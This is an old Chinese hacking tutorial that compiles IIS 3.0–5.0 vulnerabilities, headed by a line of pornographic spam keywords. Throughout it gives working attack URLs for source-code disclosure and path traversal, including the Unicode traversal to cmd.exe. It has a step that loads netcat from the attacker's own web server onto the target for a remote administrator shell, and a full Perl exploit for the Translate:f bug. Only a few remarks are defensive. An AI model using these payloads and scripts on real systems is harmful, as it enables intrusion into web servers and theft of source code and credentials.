欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

IIS漏洞整理大全

 更新時(shí)間:2007年01月16日 00:00:00   作者:  
去年下半年關(guān)于IIS的漏洞層出不窮,鑒于目前IIS的廣泛使用,覺(jué)得有必要把收集的資料加以總結(jié)一下。 

1.介紹 


  這里介紹的方法主要通過(guò)端口80來(lái)完成操作,具有很大的威脅性,因?yàn)樽鳛榫W(wǎng)絡(luò)服務(wù)器80端口總要打開(kāi)的。如果想方便一些,下載一些WWW、CGI掃描器來(lái)輔助檢查。 
  而且要知道目標(biāo)機(jī)器運(yùn)行的是何種服務(wù)程序,你可以使用以下命令: 
telnet <目標(biāo)機(jī)> 80 
GET HEAD / HTTP/1.0 
就可以返回一些域名和WEB服務(wù)程序版本,如果有些服務(wù)器把WEB服務(wù)運(yùn)行在8080,81,8000,8001口,你就TELNET相應(yīng)的口上。 


2.常見(jiàn)漏洞 

(1)、Null.htw 
  IIS如果運(yùn)行了Index  
Server就包含了一個(gè)通過(guò)Null.htw有關(guān)的漏洞,即服務(wù)器上不存在此.htw結(jié)尾的文件。這個(gè)漏洞會(huì)導(dǎo)致顯示ASP腳本的源代碼,  
global.asa里面包含了用戶帳戶等敏感信息。如果攻擊者提供特殊的URL請(qǐng)求給IIS就可以跳出虛擬目錄的限制,進(jìn)行邏輯分區(qū)和ROOT目錄的訪問(wèn)。而這個(gè)"hit-highlighting"功能在Index  
Server中沒(méi)有充分防止各種類型文件的請(qǐng)求,所以導(dǎo)致攻擊者訪問(wèn)服務(wù)器上的任意文件。Null.htw功能可以從用戶輸入中獲得3個(gè)變量: 
CiWebhitsfile 
CiRestriction 
CiHiliteType 
  你可通過(guò)下列方法傳遞變量來(lái)獲得如default.asp的源代碼: 
http://www.目標(biāo)機(jī).com/null.htw?CiWebhitsfile=/default.asp & 
CiRestriction=none & &CiHiliteType=full其中不需要一個(gè)合法的.htw文件是因?yàn)樘摂M文件已經(jīng)存儲(chǔ)在內(nèi)存中了。 

(2)、MDAC- 執(zhí)行本地命令漏洞 
  這個(gè)漏洞出現(xiàn)得比較早,但在全球范圍內(nèi),可能還有好多IIS  
WEB服務(wù)器存在這個(gè)漏洞,就像在今天,還有很多人在用Windows3.2一樣。IIS的MDAC組件存在一個(gè)漏洞,可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行目標(biāo)系統(tǒng)的命令。主要核心問(wèn)題是存在于RDSDatafactory,默認(rèn)情況下,它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶的身份運(yùn)行,在默認(rèn)情況下是SYSTEM用戶。我們可以通過(guò)以下辦法測(cè)試本機(jī)是否存在這個(gè)漏洞: 
c:\>nc -nw -w 2 <目標(biāo)機(jī)> 80 
GET /msadc/msadcs.dll HTTP 
  如果你得到下面的信息: 
application/x_varg 
  就很有可能存在此漏洞且沒(méi)有打上補(bǔ)丁,你可以使用rain forest  
puppy網(wǎng)站的兩個(gè)程序進(jìn)行測(cè)(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl。 

(3)、ASP Dot Bug 
  這個(gè)漏洞出現(xiàn)得比較早了,是Lopht小組在1997年發(fā)現(xiàn)的缺陷,這個(gè)漏洞也是泄露ASP源代碼給攻擊者,一般在IIS3.0上存在此漏洞,在請(qǐng)求的URL結(jié)尾追加一個(gè)或者多個(gè)點(diǎn)導(dǎo)致泄露ASP源代碼。http://www.目標(biāo)機(jī).com/sample.asp. 

(4)、idc & .ida Bugs 
  這個(gè)漏洞實(shí)際上類似ASP dot  
漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪有些人還在IIS5.0上發(fā)現(xiàn)過(guò)此類漏洞,通過(guò)增加?idc?或者?ida?后綴到URL會(huì)導(dǎo)致IIS嘗試允許通過(guò)數(shù)據(jù)庫(kù)連接程序.DLL來(lái)運(yùn)行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。 
http://www.目標(biāo)機(jī).com/anything.idc 或者 anything.idq 

(5)、+.htr Bug 
  這個(gè)漏洞是由NSFOCUS發(fā)現(xiàn)的,對(duì)有些ASA和ASP追加+.htr的URL請(qǐng)求就會(huì)導(dǎo)致文件源代碼的泄露: 
http://www.目標(biāo)機(jī).com/global.asa+.htr 

(6)、NT Site Server Adsamples 漏洞 
  通過(guò)請(qǐng)求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者可能獲得一些如數(shù)據(jù)庫(kù)中的DSN,UID和PASS的一些信息,如: 
http://www.目標(biāo)機(jī).com/adsamples/config/site.csc 

(7)、IIS HACK 
  有人發(fā)現(xiàn)了一個(gè)IIS4.0的緩沖溢出漏洞,可以允許用戶上載程序,如上載netcat到目標(biāo)服務(wù)器,并把cmd.exe綁定到80端口。這個(gè)緩沖溢出主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到站點(diǎn)www.technotronic.com中去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器,也可以是虛擬服務(wù)器哦。你現(xiàn)在你自己的WEB服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器: 
c:\>iishack.exe <目標(biāo)機(jī)> 80 <你的WEB服務(wù)器>/ncx.exe 
  然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器: 
c:\>nc <目標(biāo)機(jī)> 80  
  如果溢出點(diǎn)正確,你就可以看到目標(biāo)機(jī)器的命令行提示,并且是遠(yuǎn)程管理權(quán)限。Codebrws.asp  
& Showcode.asp  
。Codebrws.asp和Showcode.asp在IIS4.0中是附帶的看文件的程序,但不是默認(rèn)安裝的,這個(gè)查看器是在管理員允許查看樣例文件作為聯(lián)系的情況下安裝的。但是,這個(gè)查看器并沒(méi)有很好地限制所訪問(wèn)的文件,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞來(lái)查看目標(biāo)機(jī)器上的任意文件內(nèi)容,但要注意以下幾點(diǎn): 
1.Codebrws.asp 和 Showcode.asp默認(rèn)情況下不安裝。 
2.漏洞僅允許查看文件內(nèi)容。 
3.這個(gè)漏洞不能繞過(guò)WINDOWS NT的ACL控制列表的限制。 
4.只允許同一分區(qū)下的文件可以被查看(所以把IIS目錄和WINNT分區(qū)安裝是個(gè)不錯(cuò)的方案,這樣也可能比較好的防止最新的IIS5.0的unicode漏洞). 
5,攻擊者需要知道請(qǐng)求的文件名。  
  例如你發(fā)現(xiàn)存在這個(gè)文件并符合上面的要求,你可以請(qǐng)求如下的命令:  
http://www.目標(biāo)機(jī).com/iisamples/exair/howitworks/codebrws.asp?source=/ 
iisamples/exair/howitworks/codebrws.asp 
你就可以查看到codebrws.asp的源代碼了。 
你也可以使用showcode.asp來(lái)查看文件: 
http://www.目標(biāo)機(jī).com/msadc/samples/selector/showcode.asp? 
source=/msadc/../../../../../winnt/win.ini 
  當(dāng)然你也可以查看一些FTP信息來(lái)獲得其他的目標(biāo)管理員經(jīng)常使用的機(jī)器,或許其他的機(jī)器的安全性比WEB服務(wù)器差,如: 
http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp? 
source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log 

(8)、webhits.dll & .htw 
  這個(gè)hit-highligting功能是由Index  
Server提供的允許一個(gè)WEB用戶在文檔上highlighted(突出)其原始搜索的條目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致可以查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目: 
http://www.目標(biāo)機(jī).com/nosuchfile.htw 
  如果你從服務(wù)器端獲得如下信息: 
format of the QUERY_STRING is invalid 
這就表示你存在這個(gè)漏洞。 
  這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序: 
/iissamples/issamples/oop/qfullhit.htw 
/iissamples/issamples/oop/qsumrhit.htw 
/isssamples/exair/search/qfullhit.htw 
/isssamples/exair/search/qsumrhit.htw 
/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用) 
  攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容: 
http://www.目標(biāo)機(jī).com/iissamples/issamples/oop/qfullhit.htw? 
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full 
  就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 
(9)、ASP Alternate Data Streams(::$DATA) 
  $DATA這個(gè)漏洞是在1998年中期公布的,$DATA是在NTFS文件系統(tǒng)中存儲(chǔ)在文件里面的main  
data  
stream屬性,通過(guò)建立一個(gè)特殊格式的URL,就可能使用IIS在瀏覽器中訪問(wèn)這個(gè)data stream(數(shù)據(jù)流),這樣做也就顯示了文件代碼中這些data  
stream(數(shù)據(jù)流)和任何文件所包含的數(shù)據(jù)代碼。 
  其中這個(gè)漏洞需要下面的幾個(gè)限制,一個(gè)是要顯示的這個(gè)文件需要保存在NTFS文件分區(qū)(幸好為了"安全"好多服務(wù)器設(shè)置了NTFS格式),第二是文件需要被ACL設(shè)置為全局可讀。而且未授權(quán)用戶需要知道要查看文件名的名字,WIN  
NT中的IIS1.0, 2.0,  
3.0和4.0都存在此問(wèn)題。微軟提供了一個(gè)IIS3.0和4.0的版本補(bǔ)丁, 
要查看一些.asp文件的內(nèi)容,你可以請(qǐng)求如下的URL: 
  http://www.目標(biāo)機(jī).com/default.asp::$DATA  
你就得到了源代碼。你要了解下NTFS文件系統(tǒng)中的數(shù)據(jù)流問(wèn)題,你或許可以看看這文章: 
http://focus.silversand.net/newsite/skill/ntfs.txt 

(10)、ISM.DLL 緩沖截?cái)嗦┒?nbsp;
  這個(gè)漏洞存在于IIS4.0和5.0中,允許攻擊者查看任意文件內(nèi)容和源代碼。通過(guò)在文件  
名后面追加近230個(gè)+或者? ?(這些表示空格)并追加?.htr?的特殊請(qǐng)求給IIS,會(huì)使IIS認(rèn)為客戶端請(qǐng)求的是?.htr?文件,而.htr文件的后綴映射到ISM.DLL  
ISAPI應(yīng)用程序,這樣IIS就把這個(gè).htr請(qǐng)求轉(zhuǎn)交給這個(gè)DLL文件,然后ISM.DLL程序把傳遞過(guò)來(lái)的文件打開(kāi)和執(zhí)行,但在ISM.DLL  
截?cái)嘈畔⒅?緩沖區(qū)發(fā)送一個(gè)斷開(kāi)的 .Htr  
并會(huì)延遲一段時(shí)間來(lái)返回一些你要打開(kāi)的文件內(nèi)容??墒且⒁?,除非 WEB  
服務(wù)停止并重啟過(guò),否則這攻擊只能有效執(zhí)行一次。如果已經(jīng)發(fā)送過(guò)一個(gè) .htr  
請(qǐng)求到機(jī)器上,那么這攻擊會(huì)失效.它只能在 ISM.DLL 第一次裝入內(nèi)存時(shí)工作。 
http://www.目標(biāo)機(jī).com/global.asa (...<=230)global.asa.htr 

(11)、存在的一些暴力破解威脅.htr程序 
  IIS4.0中包含一個(gè)嚴(yán)重漏洞就是允許遠(yuǎn)程用戶攻擊WEB服務(wù)器上的用戶帳號(hào),就是你的WEB服務(wù)器是通過(guò)NAT來(lái)轉(zhuǎn)換地址的,還可以被攻擊。每個(gè)IIS4.0安裝的時(shí)候建立一個(gè)虛擬目錄/iisadmpwd,這個(gè)目錄包含多個(gè).htr文件,匿名用戶允許訪問(wèn)這些文件,這些文件剛好沒(méi)有規(guī)定只限制在loopback  
addr(127.0.0.1),請(qǐng)求這些文件就跳出對(duì)話框讓你通過(guò)WEB來(lái)修改用戶的帳號(hào)和密碼。這個(gè)目錄物理映射在下面的目錄下: 
c:\winnt\system32\inetsrv\iisadmpwd 
Achg.htr 
Aexp.htr 
Aexp2.htr 
Aexp2b.htr 
Aexp3.htr 
Aexp4.htr 
Aexp4b.htr 
Anot.htr 
Anot3.htr 
這樣,攻擊者可以通過(guò)暴力來(lái)猜測(cè)你的密碼。如果你沒(méi)有使用這個(gè)服務(wù),請(qǐng)立即刪除這個(gè)目錄。 

(12)、Translate:f Bug  
  這個(gè)漏洞發(fā)布于2000年8月15號(hào)(www.securityfocus.com/bid/1578),其問(wèn)題是存在OFFICE  
2000和FRONTPAGE 2000Server  
Extensions中的WebDAV中,當(dāng)有人請(qǐng)求一個(gè)ASP/ASA后者其他任意腳本的時(shí)候在HTTP  
GET加上Translate:f后綴,并在請(qǐng)求文件后面加/就會(huì)顯示文件代碼,當(dāng)然在沒(méi)有打WIN2K  
SP1補(bǔ)丁為前提。這個(gè)是W2K的漏洞,但由于FP2000也安裝在IIS4.0上,因此在IIS4.0上也有這個(gè)漏洞,你可而已使用下面的腳本來(lái)利用這個(gè)漏洞: 
############################# 
use IO::Socket; # 
my ($port, $sock,$server); # 
$size=0; # 
############################# 

$server="$ARGV[0]"; 
$s="$server"; 
$port="80"; 
$cm="$ARGV[1]"; 
&connect; 
sub connect { 
if ($#ARGV < 1) { 
howto(); 
exit; 

$ver="GET /$cm\ HTTP/1.0 
Host: $server 
Accept: */* 
Translate: f 
\n\n"; 
my($iaddr,$paddr,$proto); 
$iaddr = inet_aton($server) || die "Error: $!"; 
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; 
$proto = getprotobyname('tcp') || die "Error: $!"; 
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: 
$!"; 
connect(SOCK, $paddr) || die "Error: $!"; 
send(SOCK, $ver, 0) || die "Can't to send packet: $!"; 
open(OUT, ">$server.txt"); 
print "Dumping $cm to $server.txt \n"; 
while() { 
print OUT ; 

sub howto { 
print "type as follows: Trans.pl www.目標(biāo)機(jī).com codetoview.asp \n\n"; 

close OUT; 
$n=0; 
$type=2; 
close(SOCK); 
exit(1); 
}  

  你可以使用下面的方法來(lái)獲得源代碼: 
Trasn.pl www.目標(biāo)機(jī).com default.asp 

(13)、IIS存在的Unicode解析錯(cuò)誤漏洞 
  NSFOCUS安全小組發(fā)現(xiàn)微軟IIS 4.0和IIS  
5.0在Unicode字符解碼的實(shí)現(xiàn)中存在一個(gè)安全漏洞,導(dǎo)致用戶可以遠(yuǎn)程通過(guò)IIS執(zhí)行任意命令。當(dāng)IIS打開(kāi)文件時(shí),如果該文件名包含unicode字符,它會(huì)對(duì)其進(jìn)行解碼,如果用戶提供一些特殊的編碼,將導(dǎo)致IIS錯(cuò)誤的打開(kāi)或者執(zhí)行某些web根目錄以外的文件。 
  你可以使用下面的方法利用這個(gè)漏洞: 
(1)  
如果系統(tǒng)包含某個(gè)可執(zhí)行目錄,就可能執(zhí)行任意系統(tǒng)命令。下面的URL可能列出當(dāng)前目錄的內(nèi)容: 
http://www.目標(biāo)機(jī).com/scripts/..Á../winnt/system32/cmd.exe?/c+dir 
(2) 利用這個(gè)漏洞查看系統(tǒng)文件內(nèi)容也是可能的: 

http://www.目標(biāo)機(jī).com/a.asp/..Á../..Á../winnt/win.ini 
這個(gè)漏洞是針對(duì)中文操作平臺(tái),你也可以使用"À¯"或者"Áœ"來(lái)測(cè)試英文版本,原因就是編碼不同。 

相關(guān)文章

最新評(píng)論